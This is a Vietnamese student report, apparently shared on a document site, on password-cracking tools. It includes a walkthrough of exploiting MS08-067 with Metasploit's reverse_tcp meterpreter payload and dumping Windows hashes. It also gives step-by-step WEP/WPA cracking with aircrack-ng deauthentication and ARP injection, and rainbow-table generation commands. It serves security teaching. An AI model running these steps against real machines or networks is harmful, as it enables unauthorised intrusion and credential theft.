Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất

docx
Số trang Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất 71 Cỡ tệp Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất 3 MB Lượt tải Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất 2 Lượt đọc Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất 64
Đánh giá Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất
4.6 ( 8 lượt)
Nhấn vào bên dưới để tải tài liệu
Để tải xuống xem đầy đủ hãy nhấn vào bên trên
Chủ đề liên quan

Nội dung

BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC MỞ TPHCM KHOA CÔNG NGHỆ THÔNG TIN  Giáo Viên Hướng Dẫn : T.S Đào Thế Long Sinh viên: 1. Phan Công Lâm, Mssv:09H1012053 2.Nguyễn Thúc Toàn,Mssv:09H1012110 3.Nguyễn Huy Tưởng,Mssv:09H1012125 10, tháng 11, năm 2010 Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 1 Ophcrack là phần mềm khôi phục mật khẩu Windows miễn phí tốt nhất hiện nay.Đối với người được trang bị những hiểu biết cơ bản về hệ điều hành mà lần đầu tiên muốn khôi phục mật khẩu thì Ophcrack quả là một công cụ rất nhanh và dễ dàng sử dụng. Để sử dụng Ophcrack, bạn không cần phải truy cập vào Windows để phục hồi mật khẩu đã mất.Ophcrack cung cấp cho bạn file ISO miễn phí và bạn có thể ghi ra đĩa CD rồi khởi chạy đĩa CD đó. Khi chương trình Ophcrack đã chạy, bạn xác định vị trí tài khoản người dùng Windows và thực hiện quá trình khôi phục mật khẩu. Tất cả các bước thực hiện hoàn toàn là tự động. 1. Cài đặt OPHCRACK Việc cài đặt Ophcrack tương đối dễ, tuy nhiên có phần lựa chọn các thành phần cài đặt cần lưu ý –Hình 1. Hình 1: Chọn các compornents để cài đặt vào mục tables cho ophcrack Trên Hình 1, nếu đã download, có thể lựa chọn một số lựa chọn sau: - Continue without install the table: Cài đặt chỉ có chương trình Ophcrack, khôngcó Rainbow Table. - Download alphanumenic table from Internet (388MB-SSTI04-10K): cài đặt và Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 2 download Rainbow Table loại SSTI04-10K. - Download alphanumenic table from Internet (733MB-SSTI04-5K): cài đặt và download Rainbow Table loại SSTI04-5K. - Install alphanumenic table from CD or DVD (388MB-SSTI04-10K): cài đặt Ophcrack và sử dụng Rainbow Table loại SSTI04-10K từ CD hoặc DVD. - Install alphanumenic table from CD or DVD (733MB-SSTI04-5K): cài đặt Ophcrack và sử dụng Rainbow Table loại SSTI04-5K từ CD hoặc DVD. Rainbow Table loại SSTI04-5K có kích thước 733MB được dùng cho các máy tính có RAM từ 512MB trở lên. Rainbow Table loại SSTI04-10K có kích thước 388MB được dùng cho các máy tính ít RAM hơn. Nếu trong trường hợp bạn download riêng đĩa LiveCD, hoặc download các Rainbow Table theo link dưới đây, thì lựa chọn Continue without install the table. Code: Rainbow Table loại SSTI04-10K (388MB) http://lasecwww.epfl.ch/SSTIC04-10k.zip Rainbow Table loại SSTI04-5K (733MB) http://lasecwww.epfl.ch/SSTIC04-5k.zip Sau khi cài đặt, chạy chương trình, giao diện của Ophcrack như Hình 2. Hình 2: Giao diện Ophcrack trên Windows Trên hình 2, trước khi sử dụng, click vào nút Tables để chọn đường dẫn đến bảng Rainbow Table – hình 3. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 3 Hình 3: Select ophcrack table. Trên Hình 3, mở đến đĩa LiveCD, mục slax\ophcrack\tables, sau đó nhắp OK. 2. Kết hợp metasploit với ophcrack crack password window winxp sp2. Trong ví dụ này chúng ta sẽ dùng backtrack 4, trong đĩa backtrack này có tích hợp sẵn metasploit và ophcrack. Sau đây là các bước để thực hiện các bước crack một password của window xp sp2. ở đây ta sẽ lợi dụng lỗi bảo mật “Microsoft Security Bulletin MS08-067 của Microsoft cho Windows Server Service” để khai thác thông tin. Đây là lỗ hổng nghiêm trọng nằm trong dịch vụ Server Service RPC của hệ điều hành Windows.Với lỗi này, Hacker hoàn toàn có thể điều khiển máy tính từ xa với quyền cao nhất của hệ thống. Mức độ nguy hiểm: Rất cao. Mô tả kỹ thuật Server Service là dịch vụ cho phép máy tính cài đặt hệ điều hành Windows có thể chia sẻ file, máy in,… qua mạng và là dịch vụ không thể thiếu của hệ điều hành. Dịch vụ này hỗ trợ giao thức RPC, trong đó có một chức năng tiếp nhận và xử lý một yêu cầu muốn chuyển đổi đường dẫn (vídụ \\C\Program Files\..\Windows) về định dạng đường dẫn Canonicalization (\\C\Windows). Tuy nhiên, quá trình xử lý này đã không kiểm soát độ dài của đường dẫn trong yêu cầu và xảy ra lỗi tràn bộ đệm. Như vậy, với việc thực hiện một yêu cầu RPC với đường dẫn có độ dài “quá khổ”, Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 4 Hacker dễ dàng thực thi mã độc trên các máy tính từ xa nhằm chiếm quyền điều khiển, cài đặt virus, ăn cắp thông tin… Các bước thực hiện Bước 1: Khi chúng ta khởi động backtrack. Chúng ta mở một console và gõ lệnh theo cú pháp sau để chạy metasploit. Theo như tấm hình này ta sẽ sử dụng metasploit phiên bản 3. Bước2: ta gõ cú pháp : “use exploit/windows/smb/ms08_067_netapi” để sử dụng lỗi bảo mật này. Bước3 : ở bước này ta sẽ thực hiện các lệnh để cấu hình các thuộc tính để chuẩn bị cho cuộc tấn công chiếm quyền điều khiển. Cú pháp : set payload windows/meterpreter/reverse_tcp //Meta-Interpreter là một advanced payload. Muc đích của nó là để cung cấp những tập lệnh để khai thác, tấn công các máy remote computers.Nó được viết từ các developers dưới dạng shared object( DLL) files. Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 5 Meterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên các remote computers. set RHOST 192.168.1.1 // đây là địa chỉ ip của máy victim. set LHOST 192.168.1.2 // đây là địa chỉ ip của máy tấn công. Khi đã chuẩn bị xong các cấu hình ta sẽ có một bảng với các thong số như hình trên. Bước4: ở bước này ta sẽ tiến hành khai thác lỗi. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 6 Bước5 : Khi đã vào được máy victim. Ta dung lệnhh ashdump để hash files an trong window xp. Bước6 :Ở bước thứ 5 ta đã hash dump được file sam trong win. Ta sẽ copy đoạn hash dump đó vào trong file text. Và lưu lại. Bước7 :ta khởi động chương trình ophcrack GUI và tiến hành crack mật khẩu. Ta sẽ load file hash đã được tạo từ bước 6 vàovà nhấn nút crack. Và đợi chờ kết quả của chương trình trả về. Lưu ý :Khi sử dụng ophcrack chúng ta phải có bộ directories của rainbow table. Chúng ta có thể download các tables đó ở đây. Link download :http://sourceforge.net/projects/ophcrack/files/tables/ Dưới đây là các hình ảnh dung phần mềm ophcrack để crack file hash. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 7 Hình1 : load file hash đã copy được Hình2 :Nhấn nút crack để bắt đầu crack mật khẩu file hash Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 8 Hình3 :Khi chạy xong chúng ta sẽ thấy password đã được crack hiển thị ở cột NT Pwd. I.Giới Thiệu Về Wireless Lan(wlan),WEP,WPA WLAN là một loại mạng máy tính nhưng việc kết nối giữa các thành phần trong mạng không sử dụng các loại cáp như một mạng thông thường, môi trường truyền thông của các thành phần trong mạng là không khí. Các thành phần trong mạng sử dụng sóng điện từ để truyền thông với nhau.Institute of Electrical and Electronics Engineers(IEEE) đã phê chuẩn sự ra đời của chuẩn 802.11, với tên gọi WIFI (Wireless Fidelity) cho các mạng WLAN.Là một bộ giao thức cho thiết bị không dây dựa trên chuẩn 802.11a/b/g bao gồm các Access Point và các thiết bị đầu cuối không dây như pc card, usb card, wifi PDA… kết nối với nhau. Wifi hiện nay có 3 kiểu mã hoá chính gồm: WEP-Wired Equivalent Privacy , WPA-Wireless Protected Access và WPA2. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 9 WEP (Wired Equivalent Privacy) là một hệ thống dùng để mã hóa, giải mã dữ liệu và bảo mật dữ liệu cho mạng Wireless, WEP là một phần của chuẩn 802.11 gốc dựa trên thuật toán mã hóa RC4, mã hóa dữ liệu 40bit để ngăn chặn sự truy cập trái phép từ bên ngoài. WPA (Wi-fi Protected Access) được thiết kế nhằm thay thế cho WEP vì có tính bảo mật cao hơn. Temporal Key Intergrity Protocol (**IP), còn được gọi là WPA key hashing là một sự cải tiến dựa trên WEP, là vì nó tự động thay đổi khóa, điều này gây khó khăn rất nhiều cho các Attacker dò thấy khóa của mạng.Mặt khác WPA cũng cải tiến cả phương thức chứng thực và mã hóa. WPA bảo mật mạnh hơn WEP rất nhiều. II.Aircrack-ng: II.1-Giới thiệu Aircrack-ng: Hầu như hiện nay khi nhắc tới Crack password Wireless thì chúng ta nghĩ ngay đến chương trình Aircrack. Aircrack là chương trình crack password wireless rất mạnh, một công cụ bẻ khóa WEP/WPA nhanh nhất,chạy được trên Windows và Linux. Aircrack hỗ trợ các chuẩn không giây 802.11a/b/g dùng để Crack WEP và WPA-PSK. Nó có thể giải mã các mã hóa WEP sử dụng key có chiều dài từ 40 tới 512-bits và đủ cho giải mã hầu hết các gói tin trên mạng Wireless. Công cụ này còn hỗ trợ để bẻ khóa WPA1 và WPA2 bằng phương thức Brute Force Attack. Ngoài ra với airdecap chúng có khả năng giải mã các file được mã hóa bởi WEP và WPA. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 10 II.2 Aircrack-ng hỗ trợ việc lựa chọn card wireless thích hợp: Linux Tên Card Loại Chipset Antenn a Windows hỗ trợ Airlink AWLC4030 CardBus Atheros Nội bộ airodump-ng Belkin F5D7010ed CardBus Atheros Nội bộ Có Belkin F5D8071 ExpressCar d Atheros Nội bộ Có D-Link DWA-643 ExpressCar d Atheros D-Link DWL-650 PCMCIA D-Link DWL-G630 C2 v3.01 CardBus hỗ trợ Có Nội bộ Chưa xác nhận Có Prism 2,5 Nội bộ airodump-ng Có Atheros Nội bộ airodump-ng Có Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 11 D-Link DWL-G630 E1 Ralink Atheros Nội bộ Airodump-ng Có D-Link DWL-G650 C3 , C4 , B5 C3, C4, B5 CardBus Atheros Nội bộ Airodump-ng Có Linksys WPC55AG v1.2 v1.2 CardBus Atheros Nội bộ có Có MSI CB54G2 CardBus Ralink Nội bộ Không Có Netgear WAG511 CardBus Atheros Nội bộ Airodump-ng có Netgear WG511T CardBus Atheros Nội bộ Airodump-ng có Netgear WG511U CardBus Atheros Nội bộ Airodump-ng có Proxim 8470-WD CardBus Atheros MMCX không có Senao NL-2511 CD PLUS EXT CD PLUS EXT PCMCIA Prism 2,5 MMCX không có SMC SMCWCBT-G CardBus Atheros Nội bộ Airodump-ng có TP-Link TL-WN610G CardBus Atheros Nội bộ Airodump-ng có TRENDnet TEW-441PC CardBus Atheros Nội bộ Airodump-ng có Ubiquiti SRC CardBus Atheros MMCX Airodump-ng có Khuyến cáo ta nên dùng card Atheros chipset. II.2-Một số điều cần biết khi Crack Password: 1. Card mạng của bạn không chuyển về chế độ monitor được – hãy xem danh sách card được hỗ trợ trên trang trên. 2. Chỉ có thể dò được khóa WPA/WPA2-PSK3. Change mac address có thể sẽ gặp lỗi không authentication được. 4. Sự im lặng của router: nếu trong mạng của AP không có máy con kết nối thì ta sẽ nhanh chóng nhận ra là mình không hề bắt được một gói tin ARP nào hết. Lý do là các AP đời sau này đã được harderning, chúng rất yên lặng, khó mà cạy ra được một Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 12 gói tin ARP nào. Giải pháp:là hãy thử crack nó vào một thời gian khác hoặc dùng mdk3 để cố gắng reset AP, khi AP khởi động lại, nó sẽ quăng ra một ít gói tin ARP, dùng koreK hoặc fragment để crack chúng thôi 5.Khi bạn dùng Aireplay mà thấy gói tin gởi đi nhưng không có trả lời (ACK) thì mình phải chuyển sang STATION khác và áp dụng tương tự. 6.Dùng lệnh aireplay-ng mà thấy data tăng lên thì mới được chứ data mà đứng yên thì thua rồi. 7. Khi không thể chứng thực với AP thì có nhiều nguyên nhân, sai kênh, sai MAC AP(BSSID), quá xa, không có Client nào đang kết nối với AP. II.3- Tiến Trình Chi Tiết Để Crack Password. 1. Xem interface của card mạng _iwcofig hoặc __ifcofig để xem có những card mạng nào trong máy, thường là eth0 và wlan0(chúng ta sẽ dùng wlan0) 2. Chuyển wlan0 về chế độ nghe ngóng _airmon-ng wlan0 start. Lệnh này sẽ tạo ra một card wireless ảo là mon0 3. Scan mạng wireless trong vùng bắt sóng. _airodump-ng wlan0(mon0) để bắt sóng wifi. 4. Tiến hành bắt gói tin _airodump-ng --channel [AP channel]--bssid [MAC AP ] --write capturefile wlan0 bắt gói tin của AP trên kênh nào đó với cái BSSID là MAC của AP và ghi ra một tên file . 5. Tiến hành bắt tay với AP để tạo ra dòng tín hiệu. _ aireplay-ng -1 0 -a -c wlan0 Trong cơ chế bảo mật WPA, khi muốn kết nối với AP thì Client cần phải gởi gói tin chứa 4-way handshake đến AP, trong gói tin đó chứa password(đã được hash) của mạng. Để được password ta phải có gói tin trên. Lưu ý: aireplay-ng -1 0: gởi tin tới AP tới bao giờ được chứng thực Ý nghĩa của lệnh này là AP sẽ thông báo Client đã bị đá ra khỏi mạng và client sẽ phải gửi gói tin chứa 4-way handshake để yêu cầu kết nối lại. Khi đó máy của hacker ta sẽ bắt được gói tin 6.Tạo cơ sở dữ liệu Dùng lệnh theo thứ tự: _airolib-ng crackwpa import essid essid.txt để tạo CSDL tên là crackwpa và import cái tên AP vào trong cái file essid.txt mình đã tạo sẵn. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 13 -airolib-ng crackwpa import passwd /đường dẫn tới file password.lst -airolib-ng crackwpa --batch: Kết hợp essid với password -airolib-ng crackwpa stats: kiểm tra tính hợp lệ Mục đích phần này là ta sẽ so sánh password với cái CSDL có trong Backtrack, vì thực chất việc dò password là so sánh gói tin với list pass có sẵn trong máy 7.Crack capture file, tìm khoá password wep,wpa. _aircrack-ng -b [AP BSSID] [capture file(s) name] _aircrack-ng -r crackwpa wpa*.cap Aircrack sẽ bắt đầu lục lọi trong số những gói dữ liệu đã bắt được để tìm ra khóa WEP. III.Crack Password Wireless WEP Bằng Aircrack 1.Chuẩn bị : 1.1.Phần cứng : _ 1 AP có hỗ trợ bảo mật WEP _ 1 PC có wireless card kết nối với AP-> Client Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 14 _ 1 PC có wireless card là Atheros có hỗ trợ monitor và chế độ injection(chèn gói tin)-> Attacker 1.2.Phần mềm : PC của Attacker : _ HĐH Linux (mình sẽ dùng BackTrack 4) _ HĐH Windows _ Aircrack-ng 2. Crack Password Wireless WEP Bằng Aircrack 2.1.Các bước cơ bản : _ _ _ _ Bước Bước Bước Bước 1 2 3 4 : : : : chuyển wireless card về chế độ monitor scan mạng wireless và bắt dữ liệu từ AP target bơm gói ARP để tăng lưu lượng dữ liệu bắt được sau khi bắt đủ gói dữ liệu , dùng aircrack-ng dò password 2.2.Thực hiện crack WEP: Bước 1 : Xem các interface của card mạng : Trường hợp này wireless card có interface là wlan0 Chuyển wlan0 về chế độ Monitor airmon-ng sẽ tạo ra card mạng ảo dùng cho việc Monitor tên là mon0 Bước 2 : Scan mạng wireless trong “vùng bắt sóng” của wireless card Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 15 Trong “vùng bắt sóng” của wireless card có 2 AP có WEP , 1 AP là SSID là Diep , 1 AP là quang1 (AP này có Power là -1 tức là mạng ad-hoc) (ngoài ra còn có 1 AP mà cột ESSID ghi là tức là AP ẩn , Hidden SSID) AP mà ta quan tâm là Diep có BSSID (MAC Address) 00:14:6C:06:D7:96 , ESSID (tên định danh của mạng) Diep , Channel là 11, và đang có 2 client kết nối . (tắt process airodump-ng mon0 đi) Em xin giải thích một số thông số chính: • BSSID: địa chỉ Mac của AP cần hack, có bao nhiêu AP sẽ được liệt kê hết ở đây. • PWR: là power ,chỉ độ mạnh yếu của mạng, power = -1 đó là mạng adhoc. • Beacons: là các mốc kết nối • #Data: số data luân chuyển trong mạng. Dữ liệu càng cao càng tốt. • #/s : là số lượng packet chuyển trong mạng trong 1 s.Tốc độ kết nối càng cao càng tốt. • CH là channel (Kênh kết nối), một thông số quan trọng trong việc crack khóa. • Thông số MB là chuẩn của AP: 11 MB là chuẩn b, 54 MB là chuẩn g. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 16 • • • • • ESSID là tên của mạng(AP), nếu AP đang ẩn tên thì nó sẽ có dạng . ENC : Bảo mật theo giao thức nào đó WEP, WPA, WPA2,... CIPHER: Mã hóa theo kiểu nào đó CCMP, WEP,... AUTH: Chứng thực theo kiểu nào đó PSK, TKIP,... STATION: MAC của Client đang kết nối tới AP. Ta sẽ bắt dữ liệu từ AP Diep -c 11 : channel của AP -w wep : dữ liệu bắt được sẽ lưu vào file wep.cap (4 file wep* sẽ được tạo ra , xem hình bên dưới) -d 00:14:6C:06:D7:96 : BSSID của AP mon0 : interface ảo của wireless card dùng cho việc monitor => lệnh này có nghĩa là : mon0 sẽ bắt các gói dữ liệu đi qua AP có MAC là 00:14:6C:06:D7:96 trên kênh 11 và ghi vào file wep.cap Những Client có PoWeR -1 là những client “bất hoạt” hoặc “ngoài vùng bắt sóng” của wireless card , ta chỉ cần quan tâm đến client có BSSID là 00:13:E8:BE:E9:C5. Bước 3 : Theo lý thuyết , muốn dò ra password của AP thì phải cần ít nhất khoảng 200.000 gói dữ liệu (tức là cột #data phải đạt đến con số 200.000) , nhưng trên thực tế thì khi data đạt đến 20.000-50.000 là có thể dò ra password. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 17 Nếu cứ để lệnh airodump-ng bắt dữ liệu không thôi thì có khi đợi cả ngày vẫn chưa có 20.000 gói dữ liệu , do đó ta phải bắt và “bơm” các gói ARP để tăng lưu lượng dữ liệu qua lại aireplay-ng -3 : standard ARP-request replay -x 1000 : “bơm” 1000 gói mỗi giây (max là 1024 gói, mặc định là 500) -b 00:14:6C:06:D7:96 : MAC address, Access Point -h 00:13:E8:BE:E9:C5 : set Source MAC address , tức là MAC của client mon0 : interface ảo của wireless card dùng cho việc monitor => lệnh này có nghĩa là : mon0 sẽ giả client 00:13:E8:BE:E9:C5 để “bơm” ARP vào AP 00:14:6C:06:D7:96, mỗi giây 1000 gói. Các gói ARP được tạo ra khi client có yêu cầu kết nối với AP , vì vậy ta phải “đá” client ra : aireplay-ng -0 1 : deauthenticate 1 lần -a 00:14:6C:06:D7:96 : set Access Point MAC address -c 00:13:E8:BE:E9:C5: set Destination MAC address mon0 : interface ảo của wireless card dùng cho việc monitor => lệnh này có nghĩa là : mon0 sẽ giả danh AP 00:14:6C:06:D7:96 và gởi đến client 00:13:E8:BE:E9:C5 thông tin rằng “anh đã bị đá ra khỏi mạng” , client sẽ phải gởi gói ARP yêu cầu kết nối lại với AP. Lúc này lệnh aireplay-ng -3 ở trên sẽ bắt được gói ARP và “bơm” nó vào AP Quay lại cửa sổ của lệnh airodump-ng và aireplay-ng ta sẽ thấy cột #Data tăng lên rất nhanh Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 18 Bước 4 : Đến khi cột #Data được trên 20.000 gói thì ta bắt đầu dò password từ file .cap (được tạo ra ở bước 2) bằng lệnh aircrack-ng Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 19 Password dò được là 0987177185 (sau khi đã lọc ra các dấu “ : “ ) IV.Crack Password Wireless WPA Bằng Aircrack Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 20 IV.1-Chuẩn bị : a).Phần cứng : _ 1 AP có hỗ trợ bảo mật WPA _ 1 PC có wireless card kết nối với AP-> Client _ 1 PC có wireless card là Atheros có hỗ trợ monitor và chế độ injection(chèn gói tin)-> Attacker b).Phần mềm : PC của Attacker : _ HĐH Linux (ở đây sẽ là BackTrack 4) _ HĐH Windows _ Aircrack-ng _ 1 file từ điển chứa các từ khóa có khả năng là password , hoặc 1 pre-computed database (dùng airolib-ng để tạo) IV.2. Crack Password Wireless WPA Bằng Aircrack IV.2.1.Các bước cơ bản : _ Bước 1 : _ Bước 2 : _ Bước 3 : _ Bước 4 : password chuyển wireless card về chế độ monitor scan mạng wireless và bắt dữ liệu từ AP target bắt 4-way handshake dùng aircrack-ng + file từ điển (hoặc pre-computed database) để dò IV.2.2.Thực hiện Crack Password Wireless WPA: Bước 1 : Xem các interface của card mạng : Trường hợp này wireless card có interface là wlan0 Chuyển wlan0 về chế độ Monitor Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 21 airmon-ng sẽ tạo ra card mạng ảo dùng cho việc Monitor tên là mon0 Bước 2: Scan mạng wireless trong “vùng bắt sóng” của wireless card Ở đây ta có 1 AP có BSSID là 00:13:D4:68:D2:08 , channel 7 , bảo mật WPA2 , mã hóa kiểu CCMP , chứng thực PSK , cột ESSID ghi là tức là AP ẩn , và có 1 client 00:13:E8:BE:E9:C5 đang connect Ta sẽ bắt dữ liệu từ AP ẩn có BSSID 00:13:D4: 68: D2:08 trên channel 7 và ghi vào file wpa2.cap Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 22 Bước 3 : Trong cơ chế bảo mật WPA, khi muốn kết nối với AP, client sẽ gởi gói tin có chứa 4way handshake đến đến AP, trong gói tin đó có chứa thông tin về password (đã được hash) của mạng WPA . Ta phải được gói tin có chứa 4-way handshake thì mới có thể tìm ra được password. Để làm được điều này , ta phải “đá” client ra : aireplay-ng -0 1 : deauthenticate 1 lần -a 00:13:D4:68:D2:08 : set Access Point MAC address Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 23 -c 00:16:44:7B:F9:BC : set Destination MAC address mon0 : interface ảo của wireless card dùng cho việc monitor => lệnh này có nghĩa là : mon0 sẽ giả danh AP 00:13:D4:68:D2:08 và gởi đến client 00:16:44 :7B:F9:BC thông tin rằng “anh đã bị đá ra khỏi mạng” , client sẽ phải gởi gói tin chứa 4-way handshake yêu cầu kết nối lại với AP. Lúc này lệnh airodump-ng ở trên sẽ bắt được gói tin chứa 4-way handshake , và cũng sẽ dò ra được SSID của AP . (quay lại cửa sổ airodump-ng) Bước 4 : Công việc cần làm bây giờ là phải dò ra password từ gói dữ liệu chứa 4-way handshake mà ta bắt được (đã lưu vào file .cap) Ta chỉ quan tâm đến 3 file : _ database : file pre-computed database , chứa các từ khóa đã được hash (ở dạng binary) cho phù hợp với các SSID cụ thể . _ dic : file từ điển , chứa các từ khóa (ở dạng text) có thể là password của AP _ wpa2-01.cap : file chứa 4-way handshake,được tạo ra bởi lệnh airodump-ng ở bước 2+3 Chúng tôi đã có : + file từ điển dung lượng ~ 40MB chưa ~ 3 triệu từ khóa + file database được tạo nên từ file từ điển trên , tương thích với SSID là default Bắt đầu dùng aircrack-ng kết hợp với file từ điển đề dò password bắt được trong file .cap : Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 24 Như ta thấy , nếu chỉ dùng file từ điển thô thì tốc độ dò chỉ khoảng 400 từ trên 1 giây -> muốn dò được hết file từ điển 3 triệu từ thì mất khoảng 7500 giây ~ 2 giờ 5 phút Để rút ngắn thời gian thì ta sẽ dùng aircrack-ng kết hợp với database : Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 25 Tốc độ đạt được gần 40.000 từ trên 1 giây -> 3 triệu từ mất hơn 1 phút . Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 26 Sau 1 phút 19 giây thì đã dò ra được password . I.Giới thiệu về RainbowCrack : RainbowCrack là chương trình tạo ra các bảng cầu vồng được dùng để crack password đã được mã hóa. Là công cụ bẻ khóa mật khẩu "mạnh mẽ" rất hiệu quả và giảm thiểu thời gian crack Password. Rainbow Table là một bảng lookup đưa ra một Time-Memory Trade-Off được sử dụng để khôi phục mật khẩu dạng text từ một password hash (băm). Các chương trình thường sử dụng giải thuật băm (hash) để lưu trữ mật khẩu, Rainbow Table được sử dụng để làm ngược lại quá trình hash. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 27 Thông thường các chương trình dò tìm mật khẩu thường dùng Brute Force Attach để thử với số lượng rất lớn các ký tự. Với máy tính hiện nay, việc thử này chỉ có hiệu quả khi chiều dài của mật khẩu ít hơn 8 ký tự. Với mật khẩu dài 7 ký tự và bao gồm tất cả các ký tự thì thời gian dò tìm theo kiểu Brute Force Attach mất khoảng 30 ngày. Tất nhiên với một số tính năng gắn kèm như từ điển, thuật toán thử,… thì khoảng thời gian này sẽ được rút ngắn đi, nhưng không đáng kể. Nếu sử dụng Rainbow Table, thời gian này khoảng 40 phút. I.1-Các tính năng trong RainbowCrack:  Tích hợp công cụ Full time-memory tradeoff, bao gồm các xử lý trên rainbow table , sắp xếp, chuyển đổi và tra cứu  Hỗ trợ rainbow table của bất kỳ thuật toán băm  Hỗ trợ rainbow table của bất kỳ ký tự  Hỗ trợ rainbow table trong định dạng tập tin nguyên (rt.) Và định dạng file nén (. Rtc)  Tính toán về hỗ trợ xử lý đa lõi  Hỗ trợ tính toán trên GPU (thông qua công nghệ NVIDIA CUDA)  Hỗ trợ tính toán trên đa GPU (thông qua công nghệ NVIDIA CUDA)  Thống nhất định dạng tập tin rainbow table trên tất cả các hệ điều hành hỗ trợ  Giao diện người dùng dòng lệnh  Giao diện người dùng đồ họa (Windows) ,chạy trên Windows XP 32-bit, Windows Vista 32-bit và Windows 7 32-bit. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 28 I.2-Các công cụ và mối quan hệ giữa chúng trong RainbowCrack. Phần mềm RainbowCrack bao gồm năm công cụ: rtgen, rtsort, rt2rtc, rtc2rt và rcrack. Hình dưới đây giải thích mối quan hệ giữa các công cụ. II. Xây dựng RainbowCrack: RainbowCrack technique is the implementation of Philippe Oechslin's faster time-memory trade-off technique. RainbowCrack làm việc dựa trên việc tính trước tất cả password có thể có. Sau khi quá trình time-consuming này hoàn thành,password và thông tin khác được mã hóa của chúng được chứa trong một file gọi là rainbow table Một password được mã hóa có thể được so sánh nhanh với giá trị chứa trong table và bẻ khóa trong một vài giây. Rainbow tables nhỏ sẽ làm giảm nhu cầu lưu trữ và tăng hiệu suất của công cụ rcrack. Ophcrack là công cụ bẻ khóa password áp dụng kỹ thuật rainbow table. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 29 RainbowCrack bao gồm ba công cụ được sử dụng trình tự để thực hiện những điều sau. Bước 1: Sử dụng chương trình rtgen để tạo ra các rainbow tables. Bước 2: chương trình rtsort sử dụng để sắp xếp bảng cầu vồng được tạo ra bởi rtgen. Bước 3: Sử dụng chương trình rcrack để tra cứu rainbow tables được sắp xếp theo rtsort. RainbowCrack Algorithm Reduce the Hash Compare with End Point in Rainbow table. Hash and reduce till entry not found. Entry found, load starting value. Hash and reduce till the provided hash value found. The final reduced value is the password. Hash Giao diện của Rainbow Crack Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 30 Bước 1: Sử dụng chương trình rtgen để tạo ra các bảng cầu vồng Cú pháp của dòng lệnh là: _rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index. Giải thích các thông số : tham số ý nghĩa hash_algorithm Các thuật toán băm (LM, NTLM, md5… ) được sử dụng trong bảng cầu vồng. Các ký tự của tất cả các plaintexts trong bảng cầu vồng. Tất cả các ký tự có thể được định nghĩa trong file charset.txt. Hai tham số này xác định độ dài của tất cả các plaintexts trong bảng cầu vồng. Nếu ký tự là số, plaintext_len_min là 1, và plaintext_len_max là 5. Sau đó, plaintext là "12345" có thể bao gồm trong bảng, nhưng "123456" sẽ không được tính. table_index là các "chức năng làm giảm" được sử dụng trong bảng cầu vồng. chain_len là độ dài của mỗi "chuỗi cầu vồng" trong bảng cầu vồng. Một "rainbow chain" có kích thước 16 byte là đơn vị nhỏ nhất trong một rainbow table. Một rainbow table có chứa rất nhiều các chuỗi cầu vồng. chain_num là số lượng các chuỗi cầu vồng trong rainbow table . part_index xác định "điểm bắt đầu" trong mỗi chuỗi cầu vồng được tạo ra như thế nào. Nó phải là một số (hoặc bắt đầu bằng số một) trong RainbowCrack . Charset plaintext_len_mi n plaintext_len_ma x table_index chain_len chain_len chain_num chain_num part_index part_index Cấu hình được đưa ra dưới đây sẽ sẵn sàng cho công việc cần tiến hành hash_algorithm LM, NTLM hoặc md5 Charset alpha-số = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789] hoặc loweralpha-số = [abcdefghijklmnopqrstuvwxyz0123456789] Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 31 plaintext_len_min 1 plaintext_len_max 7 chain_len 3800 chain_num 33554432 Key space 36 ^ 1 + 36 ^ 2 + 36 ^ 3 + 36 ^ 4 + 36 ^ 5 + 36 ^ 6 + 36 ^ 7 = 80603140212 Key space là số plaintexts có thể cho các plaintext_len_min, charset và plaintext_len_max chọn. kích cỡ bảng 3 GB tỷ lệ thành công 0.999 Thuật toán The time-memory tradeoff là một thuật toán xác suất. Dù các tham số được lựa chọn, luôn luôn có xác suất mà các chữ thô trong bộ ký tự lựa chọn và phạm vi chiều dài plaintext là không được. Tỷ lệ thành công là 99,9% với các tham số được sử dụng trong ví dụ này. bảng hệ lệnh Các lệnh rtgen được sử dụng để tạo ra các bảng cầu vồng là: rtgen md5 loweralpha-numeric 33554432 0 rtgen md5 